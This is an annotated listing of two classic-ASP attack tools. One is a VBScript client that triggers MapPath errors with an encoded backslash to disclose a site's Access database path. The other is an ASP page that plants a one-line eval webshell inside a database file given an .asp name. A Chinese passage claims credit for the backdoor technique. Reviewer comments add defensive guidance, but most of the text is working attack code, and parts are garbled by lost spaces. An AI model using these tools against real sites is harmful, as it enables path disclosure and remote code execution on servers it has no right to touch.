' Client-side check for database-path disclosure on a classic ASP site
' (window title below: "Mappath出错获取数据库地址").
' NOTE(review): the spaces between keywords and identifiers were lost when this
' listing was extracted ("DimxStatus", "IfGetError"), so it does not parse as shown.
' Defender summary: the request sent here carries "%5c" in place of the last "/"
' of the URL, and the script then searches the response for a file path quoted
' inside the provider's error text. Serving a generic error page instead of the
' raw error text removes what is parsed below, and a database file kept outside
' the web root cannot be fetched even if its path leaks. In web-server logs the
' marker is a body-less POST whose path contains "%5c".
DimxStatus,tStatus,vServer,vHeader,vRsBody
' Prompt for the URL to test; the third argument is the pre-filled default.
GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
' Empty input or Cancel ends the script.
IfGetError=""Then
MsgBox("输入错误,程序结束!")
WScript.Quit
EndIf
' Work on the reversed URL so that the first "/" met (Chr(47)) is the last one
' of the original. Only that one is replaced (Tem2 acts as a "done" flag) by
' "c5%", which reads "%5c" once the string is reversed back.
GetError=StrReverse(GetError)
Tem2=0
ForI=1ToLen(GetError)
IfMid(GetError,I,1)=Chr(47)AndTem2=0Then
Temp=Temp&"c5%"
Tem2=Tem2+1
Else
Temp=Temp&Mid(GetError,I,1)
EndIf
Next
GetError=StrReverse(Temp)
' Send the request; xmlPost stores the response in the script-level variables.
CallxmlPost(GetError)
' Server header followed by the HTTP status code, shown as the result heading.
ErrorText=vServer&""&xStatus
' Three error-message templates are tried in turn, each quoting a path between
' single quotes: "cannot find file '...'", "'...' is not a valid path" and
' "open registry key '...'". GetStr returns "[None]" when a template is absent.
BaseSaver=GetStr(vRsBody,"找不到文件'","'。</font>"&Chr(10))
IfBaseSaver="[None]"Then
BaseSaver=GetStr(vRsBody,"<fontface="&Chr(34)&"宋体"&Chr(34)&"size=2>'","'不是一个有效的路径。")
EndIf
IfBaseSaver="[None]"Then
BaseSaver=GetStr(vRsBody,"打开注册表关键字'","'。</font>")
EndIf
' No template matched: display the whole response body. Otherwise display only
' the extracted value. In both cases the remote text is placed into the HTML
' without any encoding.
IfBaseSaver="[None]"Then
AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&vRsBody&"</textarea>"
Else
AllReturn="<TITLE>Mappath出错获取数据库地址Lilo</TITLE><Bodyscroll='no'bgcolor='menu'><B>"&ErrorText&"</B><BR><BR><textarearows='15'name='S1'cols='57'>"&BaseSaver&"</textarea>"
EndIf
' Render the result in an Internet Explorer window and bring it to the front.
CallOpenWin(AllReturn)
SetWHShell=WScript.CreateObject("WScript.Shell")
WHShell.AppActivate"Mappath出错获取数据库地址Lilo"
'WHShell.SendKeys("%{TAB}")
SetWHShell=Nothing
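' Percent-encodes the characters of vstrIn whose Asc() code does not fit in a
' single byte, emitting the high and low byte as two %XX groups.
'
' Characters whose absolute code is below &HFF are copied through unchanged.
' That includes space, "&", "=", "%" and every other reserved ASCII character,
' so the result is NOT safe to splice into a URL or form body as-is; this is a
' double-byte escaper, not a general URL encoder.
'
' Changes from the listing as extracted: the integer-division operator that was
' lost in "(innerCode And &HFF00)&HFF" is restored, the divisor is &H100 so the
' high byte is exact for every value, and each byte is always written as two
' hex digits ("%05", not "%5").
'
' vstrIn  : string to encode.
' Returns : the encoded string; "" for an empty input.
Function URLEncoding(vstrIn)
    Dim strReturn, i, ThisChr, innerCode, Hight8, Low8
    strReturn = ""
    For i = 1 To Len(vstrIn)
        ThisChr = Mid(vstrIn, i, 1)
        If Abs(Asc(ThisChr)) < &HFF Then
            strReturn = strReturn & ThisChr
        Else
            innerCode = Asc(ThisChr)
            ' Asc() can be negative here; fold it into 0..65535 first.
            If innerCode < 0 Then
                innerCode = innerCode + &H10000
            End If
            Hight8 = (innerCode And &HFF00) \ &H100
            Low8 = innerCode And &HFF
            strReturn = strReturn & "%" & Right("0" & Hex(Hight8), 2) & "%" & Right("0" & Hex(Low8), 2)
        End If
    Next
    URLEncoding = strReturn
End Function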
' Converts a byte string (such as an XMLHTTP responseBody) into a VBScript
' string. A byte below &H80 becomes one character; any other byte is combined
' with the byte after it into one code, lead * 256 + trail, and handed to Chr().
'
' NOTE(review): this presumes a double-byte ANSI code page on the machine that
' runs it and a response in that same encoding; confirm before relying on the
' decoded text (a UTF-8 body would be decoded incorrectly).
' NOTE(review): if the final byte is >= &H80 there is no trail byte to read and
' AscB is given an empty string, which likely raises a runtime error.
'
' vIn     : byte string to decode.
' Returns : the decoded string; "" for an empty input.
Function bytes2BSTR(vIn)
    Dim decoded, pos, total, leadByte, trailByte
    decoded = ""
    total = LenB(vIn)
    pos = 1
    Do While pos <= total
        leadByte = AscB(MidB(vIn, pos, 1))
        If leadByte >= &H80 Then
            ' Two-byte character: consume the lead byte and its trail byte.
            trailByte = AscB(MidB(vIn, pos + 1, 1))
            decoded = decoded & Chr(CLng(leadByte) * &H100 + CInt(trailByte))
            pos = pos + 2
        Else
            decoded = decoded & Chr(leadByte)
            pos = pos + 1
        End If
    Loop
    bytes2BSTR = decoded
End Function
' Sends one synchronous POST to iURL through Microsoft.XMLHTTP and copies the
' status code, status text, Server header, full header block and decoded body
' into the script-level variables xStatus, tStatus, vServer, vHeader, vRsBody.
' Nothing is assigned to the function name, so the call returns no value.
' NOTE(review): Send is called without an argument, so the POST has no body;
' on the server side that is what this request looks like in the logs.
FunctionxmlPost(iURL)
' From here on every runtime error is skipped silently; after a failed request
' the response variables keep whatever they held before the call.
OnErrorResumeNext
' NOTE(review): iPost is never given a value in this listing and is not passed
' to Send, so this line has no visible effect.
iPost=URLEncoding(iPost)
SetxPost=CreateObject("Microsoft.XMLHTTP")
' Third argument False = synchronous: Send blocks until the response arrives.
xPost.open"POST",iURL,False
xPost.Send
xStatus=xPost.Status
tStatus=xPost.StatusText
vServer=xPost.GetResponseHeader("Server")
vHeader=xPost.GetAllResponseHeaders
' responseBody is raw bytes; bytes2BSTR turns it into a string.
vRsBody=bytes2BSTR(xPost.responseBody)
SetxPost=Nothing
EndFunction
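' Returns the text of vString that lies between the first occurrence of the
' start marker iString and the next occurrence of the end marker dString.
'
' Changes from the listing: the search now runs on the vString argument (the
' original ignored it and always read the script-level vRsBody), and the end
' marker is looked for only after the start marker, so an end marker that
' overlaps the start marker can no longer produce a negative length for Mid().
'
' vString : text to search.
' iString : start marker (not included in the result).
' dString : end marker (not included in the result).
' Returns : the enclosed text, or the literal "[None]" when either marker is
'           missing.
Function GetStr(vString, iString, dString)
    Dim vSum, eSum, bodyStart
    GetStr = "[None]"
    vSum = InStr(vString, iString)
    If vSum = 0 Then Exit Function
    bodyStart = vSum + Len(iString)
    eSum = InStr(bodyStart, vString, dString)
    If eSum = 0 Then Exit Function
    GetStr = Mid(vString, bodyStart, eSum - bodyStart)
End Function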
' Left-pads vNum with "0" characters until it is vLen characters long.
'
' vNum    : value to pad; its length is taken with Len().
' vLen    : wanted minimum length.
' Returns : vNum itself, unchanged and unconverted, when it is already at
'           least vLen long; otherwise the zero-padded string.
Function IntToStr(vNum, vLen)
    Dim padCount, n, zeros
    padCount = vLen - Len(vNum)
    If padCount <= 0 Then
        IntToStr = vNum
        Exit Function
    End If
    zeros = ""
    n = 1
    Do Until n > padCount
        zeros = zeros & "0"
        n = n + 1
    Loop
    IntToStr = zeros & CStr(vNum)
End Function
' Splits unStr on the delimiter vaStr and returns a view selected by Mode.
'
' Mode = -1        : the whole array of parts.
' Mode = -2        : the upper bound (last index) of that array.
' other Mode < 0   : nothing is assigned; the result stays Empty.
' Mode > last index: False.
' otherwise        : the part at index Mode (zero-based).
Function GetSplit(unStr, vaStr, Mode)
    Dim parts, lastIndex
    parts = Split(unStr, vaStr)
    lastIndex = UBound(parts)
    If Mode = -1 Then
        GetSplit = parts
    ElseIf Mode = -2 Then
        GetSplit = lastIndex
    ElseIf Mode < 0 Then
        ' Any other negative mode: leave the return value unset.
    ElseIf Mode > lastIndex Then
        GetSplit = False
    Else
        GetSplit = parts(Mode)
    End If
End Function
' Opens a 500x335 Internet Explorer window without toolbar or status bar and
' writes the HTML held in vTTv into its blank document.
' Nothing is assigned to the function name, so the call returns no value.
FunctionOpenWin(vTTv)
SetIE=WScript.CreateObject("InternetExplorer.Application")
IE.Navigate"about:blank"
IE.Visible=1
IE.ToolBar=0
IE.StatusBar=0
IE.Width=500
IE.Height=335
' Busy-wait (no sleep) until about:blank has finished loading.
DoWhile(IE.Busy):Loop
SetDoc=IE.Document
Doc.Open
' NOTE(review): the Writeln call is assembled as VBScript source text, with
' vTTv pasted between two double quotes, and run through Execute. vTTv contains
' text received from the remote server, so that text is parsed as script source
' on the local machine and then rendered as HTML. Passing the value as a plain
' argument (Doc.Writeln vTTv) and HTML-encoding the remote text before display
' avoids both.
Execute"Doc.Writeln"&Chr(34)&vTTv&Chr(34)
Doc.Close
' Only the script's reference is released; IE.Quit is never called.
SetIE=Nothing
EndFunction
另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知其他人有没有更早提前发现的。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?
<%
' Classic ASP page that opens a Jet (Access) database resolved through
' Server.MapPath, creates a table with one OLE-object column and stores a fixed
' byte string in it.
' NOTE(review): the spaces between keywords and identifiers were lost when this
' listing was extracted ("setconn", "conn.openconnstr"), so it does not parse as shown.
' Defender summary: the bytes appended below spell a server-side script element
' that evaluates a posted form field, and the database file carries an .asp
' name, i.e. an extension the web server hands to the script engine. Things to
' look for on a server: database files under the web root with a script-mapped
' extension, an unexpected table named notdownload, and the byte pattern
' "runat=server" inside a data file. Keeping the database outside the web root
' under a non-executable extension removes the precondition.
db="0123.asp"' change this to the path of your database
setconn=server.createobject("Adodb.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&Server.MapPath(db)
conn.openconnstr
' add the notdownload table (a single OLE-object column named notdown)
conn.execute("createtablenotdownload(notdownoleobject)")
' write the "<%" data
' NOTE(review): the comment above is translated from the original, which
' mentions "<%", but the bytes appended below spell a <script> element instead;
' the comment is stale.
setrs=server.createobject("adodb.recordset")
sql="select*fromnotdownload"
' Cursor type 1 (keyset) and lock type 3 (optimistic) make the recordset updatable.
rs.opensql,conn,1,3
rs.addnew
' The value is built one byte at a time with chrB so it is stored as raw bytes
' in the OLE-object column.
rs("notdown").appendchunk(chrB(asc("<"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(""))&chrB(asc("r"))&chrB(asc("u"))&chrB(asc("n"))&chrB(asc("a"))&chrB(asc("t"))&chrB(asc("="))&chrB(asc("s"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc("v"))&chrB(asc("e"))&chrB(asc("r"))&chrB(asc(""))&chrB(asc("l"))&chrB(asc("a"))&chrB(asc("n"))&chrB(asc("g"))&chrB(asc("u"))&chrB(asc("a"))&chrB(asc("g"))&chrB(asc("e"))&chrB(asc("="))&chrB(asc("j"))&chrB(asc("a"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">"))&chrB(asc("e"))&chrB(asc("v"))&chrB(asc("a"))&chrB(asc("l"))&chrB(asc("("))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("."))&chrB(asc("f"))&chrB(asc("o"))&chrB(asc("r"))&chrB(asc("m"))&chrB(asc("("))&chrB(asc("'"))&chrB(asc("#"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("+"))&chrB(asc("'"))&chrB(asc("'"))&chrB(asc(")"))&chrB(asc("<"))&chrB(asc("/"))&chrB(asc("s"))&chrB(asc("c"))&chrB(asc("r"))&chrB(asc("i"))&chrB(asc("p"))&chrB(asc("t"))&chrB(asc(">")))
rs.update
rs.close
setrs=nothing
' close the connection
conn.close
setconn=nothing
%>